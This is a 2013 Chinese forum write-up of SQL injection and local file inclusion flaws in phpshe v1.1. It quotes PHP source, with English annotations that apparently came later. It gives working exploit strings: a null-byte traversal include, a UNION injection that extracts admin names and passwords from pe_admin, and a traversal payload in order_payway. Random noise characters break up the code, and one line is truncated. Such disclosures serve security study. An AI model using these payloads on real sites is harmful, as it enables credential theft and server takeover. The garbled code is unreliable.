
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-16 16:45:03
/*******************************************************/
/* Phpshe v1.1 Vulnerability
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
// Request data is exported into the global scope with a prefix per source:
// $_g_<key> for GET, $_p_<key> for POST, $_s_<key> for SESSION, $_c_<key> for COOKIE.
// Any $_g_* / $_p_* / $_c_* variable used later in the application is therefore
// client-controlled; only the $_s_* variables originate server-side.
// get_magic_quotes_gpc() reports whether magic_quotes_gpc already added slashes
// (the function was removed in PHP 8.0); pe_stripslashes() presumably undoes that.
if (get_magic_quotes_gpc()) {
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    // Without magic quotes the values reach extract() untouched apart from pe_trim();
    // nothing here escapes them for SQL, include paths or HTML — each caller must.
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies are always passed through pe_stripslashes(), unlike GET/POST above.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

0×01 包含漏洞

//首页文件
' s2 C0 T8 A- R8 o5 L0 k! D<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);" ^0 K, j+ u( v# y/ x" R- L
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
3 n. v( P( G1 j4 qpe_result();4 a, w* [/ [5 J* _4 A" w8 d
?>1 Z! o8 P5 n" w$ d/ m) a! j; ^
//common 文件 第15行开始
url路由配置
// Route selection: defaults first, then POST overrides GET overrides the default.
$module = $mod = $act = 'index';
// Truthiness test: a value of '0' or '' falls through to the next source, and an absent
// key raises a notice. No allow-list or basename() is applied even though index.php
// interpolates $mod into an include path, so a relative path reaches the include.
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// Unlike $mod/$act, $id is given no default in the lines shown, so with neither
// parameter present the fallback reads an undefined variable (null, with a notice).
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
' P1 ~5 j8 \4 ~& `- B; u//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%009 ]; b2 h% n5 Y

0×02 搜索注入
<code id="code2">

//product.php文件
case 'list':
    // Product listing for a category, with optional keyword search and ordering.
    // The enclosing switch is not part of this excerpt.
    $category_id = intval($id);
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // search
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        // NOTE(review): "where" below is presumably "$sqlwhere" truncated in the paste — confirm.
        // $category_id is intval()'d above, so this branch is safe; category_cidarr() is not shown.
        where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // $_g_keyword is the raw GET parameter (common.php only trims it) and is interpolated
    // into the SQL string unescaped — the injection point. Escaping it (pe_dbhold(), as
    // order.php does for its id) or binding it as a parameter would close it.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; // keyword is not filtered for SQL
    if ($_g_orderby) {
        // Both halves of "<column>_<direction>" are interpolated verbatim as well: the
        // backticks do not protect against a value containing a backtick, and the direction
        // half is unquoted. Without an underscore $orderby[1] is undefined (notice). An
        // allow-list of permitted columns and directions is the usual fix.
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // The assembled fragment is passed through as a string; see pe_selectall() below.
    // $_g_page is also unvalidated here — what pe_selectall() does with it is not visible.
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // hot-seller ranking
    $product_hotlist = product_hotlist();
    // current path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进selectall函数库
// Selects all rows of `<dbpre><table>` matching $where.
// $where may be an array (order.php passes one for orderdata) or an already-built
// SQL fragment (product.php passes one); _dowhere() turns it into the condition text.
// _dowhere() is not shown here — with a string input it presumably returns it
// unchanged, since product.php's fragment already begins with " and ...".
// $table, $field and the _dowhere() result are interpolated into the statement
// verbatim; nothing in this method escapes, so callers must. $limit_page is
// handed to sql_selectall() (not shown) as-is.
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // build the condition clause
    $sqlwhere = $this->_dowhere($where);
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp
% b& g1 N4 \. _product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1

</code>
0×03 包含漏洞2
<code id="code3">

//order.php

case 'pay':
    // Payment step for an unpaid order: stores the submitted payment info on the
    // order and hands off to the chosen payway plugin. The enclosing switch is not
    // part of this excerpt.
    // pe_dbhold() is presumably an SQL-escaping helper (not shown); it is applied to
    // the GET id here but not to $_p_info further down.
    $order_id = pe_dbhold($_g_id);
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        // payway_config comes from the application's own cache, not from the request.
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    // Relies on pe_error() terminating the request; if it returns, execution continues.
    // In the lines shown the lookup is by order_id and state only — no check that the
    // order belongs to the current user.
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // $_p_info is the raw POST 'info' array (common.php exports POST as $_p_*). The
        // whole array is handed to pe_update() — what that does with unexpected keys is
        // not shown, but nothing here filters them — and only its truthiness is tested
        // before the include below.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // $_p_info['order_payway'] is interpolated into the include path with no
            // allow-list against the payway keys in $cache_payway — the file-inclusion point.
            // Checking isset($cache_payway[$_p_info['order_payway']]) before this line closes it.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }// once the update succeeds, the (limited) include is reachable
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;
}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
http://www.myhack58.com/Article/UploadPic/2013-4/20134161293183866.jpg
